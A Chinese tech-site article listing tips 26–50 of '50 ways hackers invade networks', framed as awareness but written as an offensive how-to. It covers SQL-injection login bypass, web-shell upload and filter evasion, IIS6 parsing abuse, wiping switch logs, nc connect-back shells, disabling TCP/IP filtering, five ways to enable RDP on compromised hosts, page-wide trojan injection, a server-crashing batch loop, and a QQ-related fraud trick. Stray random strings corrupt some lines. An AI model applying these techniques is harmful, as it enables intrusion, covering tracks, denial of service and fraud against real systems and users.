科技行者

行者学院 转型私董会 科技行者专题报道 网红大战科技行者

知识库

知识库 安全导航

至顶网安全频道黑客入侵网络的50种方法 (下)

黑客入侵网络的50种方法 (下)

  • 扫一扫
    分享文章到微信

  • 扫一扫
    关注官方公众号
    至顶头条

现在网上的攻击事件越来越多,黑客都是通过什么方法来攻击我们的呢?下面我们给大家总结了黑客入侵网络的五十种方法,让大家做到有备无患。

来源:论坛整理 2008年7月31日

关键字: 安全防范 入侵 黑客

  • 评论
  • 分享微博
  • 分享邮件
26. 将工具传到邮箱 在下载上右击 复制快捷方式 拥有自己了的下载空间

  27.北京冲QB要宽带号跟绑定宽带的后4位电话,当你扫出北京款待号的密码必须是8位的密码,而且开头是6或8的才可以,因为北京的电话都是6根8开头的而且都是8位的,北京的区名海淀 东城 西城 门头沟 丰台 潮阳 宣武通州 昌平,去http://cnc.qq.com/bbn/冲

  28.搜索 企业网络办公系统 添'or''=' 登陆 在个人邮箱 上传asp木马

  29.本人原创 搜索"一点点星空驿站 留言本" 默认数据库是gbmdb.mdb 很多网站用这个留言本 但是用搜索引擎搜不到 可以给大家在入寝时多个思路

  30.在程序上传shell过程中,程序不允许包含标记符号的内容的文件上传,比如蓝屏最小 的asp木马,我们来把他的标签换一下: 保存为.asp,程序照样 执行.

  31.目录权限设置变态的话可以用一些方法(比如serv-u溢出)将此web用户提权 可访问全站目录挂马

  32.喜欢网页挂马的看看这篇总结文章吧

  http://77169.com/News/hk/2005060611656.html

  33.搜索"images/admin" 或".tw/images/admin" 可以找到些台湾的数据库

  34.IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.

  将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.

  .cer 等后缀的文件夹下都可以运行任何后缀的asp木马

  35.telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP

  然后用#clear logg和#clear line vty *删除日志

  36.搜索关键字:"Copyright 2003-2004 动易网络" 后面地址改成upfile_soft.asp 这样的漏洞很多

  37.bbsxp的漏洞总结 Powered by BBSxp 5.15/Licence blog.asp中的对id 的过滤不严的漏洞 拿到管理员的前后台密码 工具:bbsxp完全版 cookies 欺骗 bbsxp 过滤了 asp 文件的上传 所以我们这里用 asa 来传马

  38.学会总结入侵思路

  39.电脑坏了省去重新安装系统的方法

  纯dos下执行,

  xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config

  2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config

  40.一般人设置啊拉QQ大盗的时候发信和收信都是同一个信箱,因此当我的机子中了此木马后没有立即杀掉进程,而是用内存编辑工具打开它的进程,查找smtp字样,就会找到它的信箱和密码了。只对1.5以前的管用. 41.内网控制内网 用vidc 还要有一只肉鸡 动画看黑基的

  http://soft.77169.com/62/20050608/6878.html

  42.有许多管理员用备份的日期做备份数据库的名字

  比如http://www.hack6.com/bbs/databackup/20050601.mdb

  43.动网数据库oldusername=%B5%F0%B7% C0&username2=%B5%F0%B7%C0&password2=19841202&adduser=%B5%F0%B7%C0&id=12&Submit=%B8%FC+%D0%C2

  不知道用户名(不是%B8%F0%B7%C0) 转化这个用他本身的页面

  http://www.hack6.com/bbs/showerr.asp?BoardID=0&ErrCodes=10,11&action=%CC%EE%D0%B4%B5%C7%C2%BC%D0%C5%CF%A2

  %CC%EE%D0%B4%B5%C7%C2%BC%D0%C5%CF%A2这句话意思是“填写登录信息”

  那么就把%CC%EE%D0%B4%B5%C7%C2%BC%D0%C5%CF%A2换成%B5%F0%B7%C0 可以看到用户名

  44.对付信息监控系统 木马必须是加密的 如net user用不了就用net1 user等等 我是大连的 大连这边主机用这方法好用 可以直接传加密的马 用用黑基tyrant的方法上传一个cmd的aspshall 用nc连接自己的nc监听端口 在web目录下写个加ftp用户的txt 本地43958用nc提交 ftp到服务器加用户

 45.解决TCP/IP筛选 在注册表里有三处,分别是:

  HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip

  HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip

  HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip

  分别用

  regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip

  regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip

  regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip

  命令来导出注册表项

  然后把三个文件里的EnableSecurityFilters"=dword:00000001,

  改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用

  regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可

  46.使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U 76hiDgJS

  SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3。

  47.开3389的5种方法

  (1)打开记事本,编辑内容如下:

  echo [Components] > c:\sql

  echo TSEnable = on >> c:\sql

  sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q

  编辑好后存为BAT文件,上传至肉鸡,执行。

  (2) (对xp\2000都有效) 脚本文件 本地开3389 工具:rots1.05

  下载地址:www.netsill.com/rots.zip

  在命令行方式下使用windows自带的脚本宿主程序cscript.exe调用脚本,例如:

  c:\>cscript ROTS.vbs <目标IP> <用户名> <密码> [服务端口] [/r]

  如果要对本地使用,IP地址为127.0.0.1或者一个点(用.表示),用户名和密码都为空(用 ""表示)。

  (3)djshao正式版5.0

  解压djshao5.0.zip,用你的随便什么方法把把解压出来的 djxyx*.**e上传到肉鸡的c:\winnt\temp下,然后进入c:\winnt\temp目录执行djxyx*.**e解压缩文件,然后再执行解压缩出来的azzd.exe文件,等一会肉鸡会自动重启!重启后会出现终端服务

  (4)下载DameWare NT Utilities 3.66.0.0 注册版

  地址www.netsill.com/dwmrcw36600.zip

  安装注册完毕后输入对方IP用户名密码,等待出现是否安装的对话框点是。

  复制启动后出现对方桌面。

  在对方桌面进入控制面版,点添加或删除程序。进入后点添加/删除windows组件,找到终端服务,点际进入 后在启动终端服务上打上勾。确定自动提示重起,重起后OK

  (5)大家最常用的 3389.exe 下载地址www.hack6.com 把程序上传到肉鸡运行后重启既可

  48.QQ上得到别人的IP

  一般跟别人聊天 如果是对方先对你说话 那么她的IP显示出来的概率就大

  当然如果是我们找对方 可以先跟她说发过去消息之后 然后关闭窗口等待她的回复

  还可以用天网防火墙选择上UDP数据保检测,即可拦截到对方ip HRl9tQot

  49.挂马js代码document.write('');保存到js页面里 可让所有页面挂马

  50.让服务器重启

  写个bat死循环:

  @echo off

  :loop1

  cls

  start cmd.exe

  goto loop1

  保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启。
    • 评论
    • 分享微博
    • 分享邮件
    邮件订阅

    如果您非常迫切的想了解IT领域最新产品与技术信息,那么订阅至顶网技术邮件将是您的最佳途径之一。

    重磅专题
    往期文章
    最新文章